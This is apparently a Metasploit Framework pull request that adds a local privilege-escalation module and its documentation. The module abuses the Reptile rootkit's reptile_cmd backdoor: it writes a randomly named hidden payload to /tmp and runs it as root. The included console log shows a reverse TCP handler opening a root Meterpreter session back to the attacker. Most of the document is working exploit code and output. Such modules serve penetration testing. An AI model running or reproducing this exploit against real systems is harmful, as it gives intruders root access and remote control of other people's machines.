### PR TITLE
Add Reptile Rootkit reptile_cmd Privilege Escalation

### DIFF
--- a/documentation/modules/exploit/linux/local/reptile_rootkit_reptile_cmd_priv_esc.md
+++ b/documentation/modules/exploit/linux/local/reptile_rootkit_reptile_cmd_priv_esc.md
@@ -1,0 +1,81 @@
+## Description
+
+  This module uses Reptile rootkit's `reptile_cmd` backdoor executable
+  to gain root privileges using the `root` command.
+
+
+## Vulnerable Application
+
+  [Reptile](https://github.com/f0rb1dd3n/Reptile) is a Linux Kernel Module (LKM) rootkit.
+
+  The `reptile_cmd` utility, installed to `/reptile` by default, permits elevating privileges
+  to root using the `root` argument.
+
+  This module has been tested successfully with Reptile from `master` branch (2019-03-04) on:
+
+  * Ubuntu 18.04.3 (x64)
+  * Linux Mint 19 (X64)
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Get a session
+  3. `use exploit/linux/local/reptile_rootkit_reptile_cmd_priv_esc`
+  4. `set SESSION [SESSION]`
+  5. `check`
+  6. `run`
+  7. You should get a new *root* session
+
+
+## Options
+
+  **REPTILE_CMD_PATH**
+
+  Path to `reptile_cmd` executable (default: `/reptile/reptile_cmd`)
+
+  **WritableDir**
+
+  A writable directory file system path. (default: `/tmp`)
+
+
+## Scenarios
+
+### Ubuntu 18.04.3 (x64)
+
+  ```
+  msf5 > use exploit/linux/local/reptile_rootkit_reptile_cmd_priv_esc 
+  msf5 exploit(linux/local/reptile_rootkit_reptile_cmd_priv_esc) > set session 1
+  session => 1
+  msf5 exploit(linux/local/reptile_rootkit_reptile_cmd_priv_esc) > set verbose true
+  verbose => true
+  msf5 exploit(linux/local/reptile_rootkit_reptile_cmd_priv_esc) > check
+
+  [+] /reptile/reptile_cmd is executable
+  [*] Output: uid=0(root) gid=0(root) groups=0(root)
+  [+] Reptile is installed and loaded
+  [+] The target is vulnerable.
+  msf5 exploit(linux/local/reptile_rootkit_reptile_cmd_priv_esc) > run
+
+  [*] Started reverse TCP handler on 172.16.191.165:4444 
+  [+] /reptile/reptile_cmd is executable
+  [*] Output: uid=0(root) gid=0(root) groups=0(root)
+  [+] Reptile is installed and loaded
+  [*] Writing '/tmp/.Q53XrrJ3RFy' (207 bytes) ...
+  [*] Executing payload...
+
+  [*] Transmitting intermediate stager...(106 bytes)
+  [*] Sending stage (985320 bytes) to 172.16.191.166
+  [*] Meterpreter session 3 opened (172.16.191.165:4444 -> 172.16.191.166:56736) at 2019-12-08 03:19:01 -0500
+
+  meterpreter > getuid
+  Server username: uid=0, gid=0, euid=0, egid=0
+  meterpreter > sysinfo
+  Computer     : 172.16.191.166
+  OS           : Ubuntu 18.04 (Linux 5.0.0-25-generic)
+  Architecture : x64
+  BuildTuple   : i486-linux-musl
+  Meterpreter  : x86/linux
+  meterpreter > 
+  ```
+

--- a/modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb
+++ b/modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb
@@ -1,0 +1,126 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Post::Linux::Priv
+  include Msf::Post::Linux::System
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Reptile Rootkit reptile_cmd Privilege Escalation',
+      'Description'    => %q{
+        This module uses Reptile rootkit's `reptile_cmd` backdoor executable
+        to gain root privileges using the `root` command.
+
+        This module has been tested successfully with Reptile from `master`
+        branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'f0rb1dd3n', # Reptile
+          'bcoles'     # Metasploit
+        ],
+      'DisclosureDate' => '2018-10-29', # Reptile first stable release
+      'References'     =>
+        [
+          ['URL', 'https://github.com/f0rb1dd3n/Reptile'],
+          ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']
+        ],
+      'Platform'       => ['linux'],
+      'Arch'           => [ARCH_X86, ARCH_X64],
+      'SessionTypes'   => ['shell', 'meterpreter'],
+      'Targets'        => [['Auto', {}]],
+      'Notes'          =>
+        {
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'Stability'   => [ CRASH_SAFE ]
+        },
+      'DefaultTarget'  => 0))
+    register_options [
+      OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])
+    ]
+    register_advanced_options [
+      OptBool.new('ForceExploit', [false, 'Override check result', false]),
+      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
+    ]
+  end
+
+  def reptile_cmd_path
+    datastore['REPTILE_CMD_PATH']
+  end
+
+  def base_dir
+    datastore['WritableDir'].to_s
+  end
+
+  def upload(path, data)
+    print_status "Writing '#{path}' (#{data.size} bytes) ..."
+    rm_f path
+    write_file path, data
+    register_file_for_cleanup path
+  end
+
+  def upload_and_chmodx(path, data)
+    upload path, data
+    chmod path
+  end
+
+  def check
+    unless executable? reptile_cmd_path
+      vprint_error "#{reptile_cmd_path} is not executable"
+      return CheckCode::Safe
+    end
+    vprint_good "#{reptile_cmd_path} is executable"
+
+    res = cmd_exec("echo id|#{reptile_cmd_path} root").to_s.strip
+    vprint_status "Output: #{res}"
+
+    if res.include?('You have no power here!')
+      vprint_error 'Reptile kernel module is not loaded'
+      return CheckCode::Safe
+    end
+
+    unless res.include?('root')
+      vprint_error 'Reptile is not installed'
+      return CheckCode::Safe
+    end
+    vprint_good 'Reptile is installed and loaded'
+
+    CheckCode::Vulnerable
+  end
+
+  def exploit
+    unless check == CheckCode::Vulnerable
+      unless datastore['ForceExploit']
+        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
+      end
+      print_warning 'Target does not appear to be vulnerable'
+    end
+
+    if is_root?
+      unless datastore['ForceExploit']
+        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
+      end
+    end
+
+    unless writable? base_dir
+      fail_with Failure::BadConfig, "#{base_dir} is not writable"
+    end
+
+    payload_name = ".#{rand_text_alphanumeric 8..12}"
+    payload_path = "#{base_dir}/#{payload_name}"
+    upload_and_chmodx payload_path, generate_payload_exe
+
+    print_status 'Executing payload...'
+    res = cmd_exec "echo '#{payload_path}&' | #{reptile_cmd_path} root & echo "
+    vprint_line res
+  end
+end


### PR DESCRIPTION
Add Reptile Rootkit reptile_cmd Privilege Escalation.

        This module uses Reptile rootkit's `reptile_cmd` backdoor executable
        to gain root privileges using the `root` command.

        This module has been tested successfully with Reptile from `master`
        branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).

